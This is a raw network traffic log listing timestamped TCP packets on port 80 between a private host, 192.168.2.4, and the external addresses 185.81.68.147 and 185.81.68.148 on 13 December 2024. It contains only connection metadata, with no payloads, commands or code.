Dec 13, 2024 07:47:46.046869993 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046878099 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046962023 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046971083 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046978951 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046991110 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047012091 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047020912 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047029972 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047039032 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047085047 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047094107 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047101974 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047111034 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047123909 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047252893 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047261953 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047270060 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047277927 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047391891 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047400951 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047408104 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047411919 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047533989 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047544003 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047655106 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047663927 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047672033 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047681093 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047692060 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047696114 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047774076 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047782898 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047791958 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047801018 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047816038 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047825098 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047921896 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.047930956 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048069954 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048079014 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048086882 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048185110 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048194885 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048218966 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048228025 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048237085 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048248053 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048259020 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048278093 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048286915 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048302889 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048311949 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048321962 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048331022 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048340082 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048348904 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048358917 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048367977 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048377991 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048387051 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048396111 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048405886 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048415899 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048433065 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048443079 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048453093 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048463106 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048471928 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048480988 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048490047 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048499107 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048507929 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048516989 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048526049 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048535109 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048543930 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048556089 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.048989058 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049017906 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049026966 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049169064 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049177885 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049185991 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049194098 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049204111 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049211979 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049221039 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049230099 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049240112 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049249887 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049258947 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049324989 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049339056 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049355030 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049364090 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049372911 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049381971 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049599886 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049609900 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049647093 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049666882 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049757004 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049766064 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049773932 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049782991 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049801111 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049809933 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049818039 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049825907 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049849033 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049856901 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049871922 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049881935 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049890995 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049900055 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.049993038 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050225019 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050255060 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050263882 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050276041 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050362110 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050370932 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050379992 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050389051 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050406933 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050416946 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050425053 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050442934 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050451994 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050461054 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050470114 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050478935 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050497055 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050506115 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050515890 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050652981 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050662994 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050826073 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050878048 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050887108 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050916910 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050926924 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050962925 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050971985 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.050981045 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051018000 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051028013 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051034927 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051043987 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051060915 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051069975 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051083088 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051116943 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051126003 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051136017 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051237106 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051389933 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051398993 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051420927 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051429987 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051448107 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051456928 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051465034 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051476002 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051526070 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051534891 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051542997 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051558018 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051567078 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051606894 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.051615953 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:47.245563984 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:47.245640039 CET	49775	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:47.247351885 CET	49746	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.247647047 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.310436010 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:47.310540915 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:47.312002897 CET	49747	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.312269926 CET	49778	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.367028952 CET	80	49746	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.367325068 CET	80	49777	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:47.367459059 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.367950916 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368036985 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368093967 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368123055 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368139982 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368160009 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368181944 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368206978 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368227959 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368247986 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368271112 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368289948 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368309975 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368329048 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368350029 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368370056 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368387938 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368407011 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368426085 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368446112 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368465900 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368489981 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368510008 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368530989 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368551016 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368570089 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368590117 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368607044 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368627071 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368645906 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368664980 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368684053 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368705034 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368722916 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368742943 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368763924 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368783951 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368803024 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368824005 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368845940 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368865013 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368884087 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368904114 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368922949 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368942022 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368962049 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368980885 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.368999004 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369019985 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369040012 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369062901 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369086027 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369103909 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369122982 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369144917 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369163990 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369184017 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369209051 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369227886 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369246960 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369268894 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369287968 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369307995 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369330883 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369353056 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369370937 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369393110 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369414091 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369434118 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369462013 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369481087 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369503021 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369523048 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369544983 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369565010 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369585037 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369604111 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369626999 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369648933 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369669914 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369690895 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369714022 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369734049 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369755030 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369775057 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369795084 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369815111 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369837999 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369858980 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369879007 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369901896 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369924068 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369945049 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369966030 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.369987965 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370007992 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370031118 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370052099 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370074034 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370093107 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370116949 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370136023 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370155096 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370174885 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370194912 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370215893 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370239973 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370260954 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370284081 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370301962 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370326996 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370347023 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370367050 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370388031 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370410919 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370430946 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370450974 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370471954 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370491028 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370512962 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370534897 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370559931 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370579958 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370599985 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370619059 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370640993 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370661974 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370681047 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370701075 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370719910 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370738029 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370758057 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370775938 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370795012 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370829105 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370835066 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370855093 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370872974 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370893002 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370912075 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370933056 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370950937 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370970011 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.370990038 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371006966 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371023893 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371043921 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371064901 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371084929 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371104002 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371124983 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371140957 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371160984 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371177912 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371196032 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371217012 CET	49777	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:47.371234894 CET	49777	80	192.168.2.4	185.81.68.148
